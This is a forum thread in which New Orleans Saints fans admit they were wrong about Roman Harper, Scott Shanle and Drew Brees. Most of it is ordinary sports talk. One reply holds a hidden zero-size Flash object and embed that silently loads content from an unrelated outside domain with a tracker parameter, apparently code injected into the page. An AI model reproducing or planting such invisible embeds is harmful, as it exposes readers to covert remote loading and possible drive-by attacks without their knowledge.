I was wrong (1 Viewer)

seguinfan

Veteran Starter
VIP Contributor
Reaction score
I was one of the biggest "get rid of Roman Harper" people out there, but it must have been Gibbs because he looks good under Williams. I was not a Harper or Shanle fan, and they both made me eat my words, I know its the 1st week, but I am willing to admit when I am wrong and it looks like I was wrong on both of them.....

Don't feel bad. I wanted Dante instead of Drew. How dumb is that? I guess that's why I am not a GM or coach. I would have driven this team into the ground by now.

I was one of the biggest "get rid of Roman Harper" people out there, but it must have been Gibbs because he looks good under Williams. I was not a Harper or Shanle fan, and they both made me eat my words, I know its the 1st week, but I am willing to admit when I am wrong and it looks like I was wrong on both of them.....

Never got down on Harper, but I was on Shanle. I 'man up' on Shanle - I was wrong.

Don't feel bad. I wanted Dante instead of Drew. How dumb is that? I guess that's why I am not a GM or coach. I would have driven this team into the ground by now.

My eyes almost fell out at this post. I would be writing obscene gestures in your yard right now if you were GM, but I'm not a Bills fan.

I like Roman Harper but I didn't see anything special from him in the Lions game. Am I missing something?

I like Roman Harper but I didn't see anything special from him in the Lions game. Am I missing something?

His play in the box to limit a(n) NFL team to rush for under 40 yards. Plus his ability to blitz from the safety position is above average. Roman Harpers coverage skill against a TE or RB are above average as well. He is just a good SS that plays head first and is still smart about it(if that makes sense?).

Go look at some game tape, he made some plays in the backfield. He gathered 6 TOT, 5 SOLO, and 1 TFL.

You are a GM, you just work for Miami not the Saints.

He was a lot better than last year I thought, after watching that game and preseason he is wrapping up and in place to make a play. I thought last year that he was out of place and not making any plays. I was praying for Maulaluga, we will see how that goes.

Still for the life of me I don't understand why people thought Dante was better. I did a huge dance of joy when we signed Drew. I really liked the way he carried himself at Purdue and figured he'd be pretty good. I thought SD was set for a long time the year they drafted LD and Drew.... WOW what a coup they pulled that year. Then AJ Smith in his infinite wisdom constantly pushed to get rid of him. What a dolt. Now I'm not saying I thought he'd be the best QB in the league right now, but I knew he was special.

Still for the life of me I don't understand why people thought Dante was better. I did a huge dance of joy when we signed Drew. I really liked the way he carried himself at Purdue and figured he'd be pretty good. I thought SD was set for a long time the year they drafted LD and Drew.... WOW what a coup they pulled that year. Then AJ Smith in his infinite wisdom constantly pushed to get rid of him. What a dolt. Now I'm not saying I thought he'd be the best QB in the league right now, but I knew he was special.

How great is it that Drew has outperformed all of our expectations? That never happens to us Saints fans.

I was thrilled to get Drew, although I was concerned as anyone about his injury. Still, I was convinced he'd make a good "interim" QB until we got the one "we really needed." I have never been so happy to be proven so wrong, ever, in my life. I think we've been pretty lucky with Henderson and Shockey, too. For the first time in forever, I think we're poised to have a great season.

Now take your lashings like a man.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Now whip it !

600full-devo.jpg

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom